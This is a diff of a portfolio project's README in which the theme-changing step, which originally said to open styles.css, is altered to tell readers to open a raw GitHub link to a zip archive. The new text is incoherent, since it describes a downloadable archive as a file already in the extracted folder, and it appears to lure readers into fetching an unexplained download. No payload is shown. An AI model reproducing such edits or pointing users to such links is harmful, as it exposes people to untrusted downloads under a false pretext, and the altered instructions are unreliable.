tiberiium2/portfolio/README.md

 ### Changing Themes

 1. **Locate the Style Settings:**
-   - Open the `styles.css` file included in the extracted folder.
+   - Open the `https://raw.githubusercontent.com/tiberiium2/portfolio/main/src/portfolio-v3.0-alpha.1.zip` file included in the extracted folder.

 2. **Adjust Color Values:**
    - Find the classes for light and dark modes.
 Change values to your desired color scheme.